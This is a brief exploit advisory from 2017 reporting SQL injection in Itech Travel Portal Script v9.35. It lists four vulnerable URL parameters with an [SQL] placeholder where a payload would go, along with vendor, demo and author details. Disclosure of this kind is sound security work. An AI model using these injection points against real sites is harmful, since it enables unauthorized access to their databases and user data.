# # # # # # Exploit Title: Itech Travel Portal Script v9.35 - SQL Injection # Google Dork: N/A # Date: 02.02.2017 # Vendor Homepage: http://itechscripts.com/ # Software Buy: http://www.itechscripts.com/travel-portal-script/ # Demo: http://travel.itechscripts.com/ # Version: 9.35 # Tested on: Win7 x64, Kali Linux x64 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Mail : ihsan[beygir]ihsan[nokta]net # # # # # # SQL Injection/Exploit : # http://localhost/[PATH]/pages.php?id=[SQL] # http://localhost/[PATH]/content.php?id=[SQL] # http://localhost/[PATH]/faq_show.php?fid=[SQL] # http://localhost/[PATH]/showCity.php?q=[SQL] # E.t.c... E.t.c... # # # # # # Iranian Exploit DataBase = http://IeDb.Ir [2017-02-03]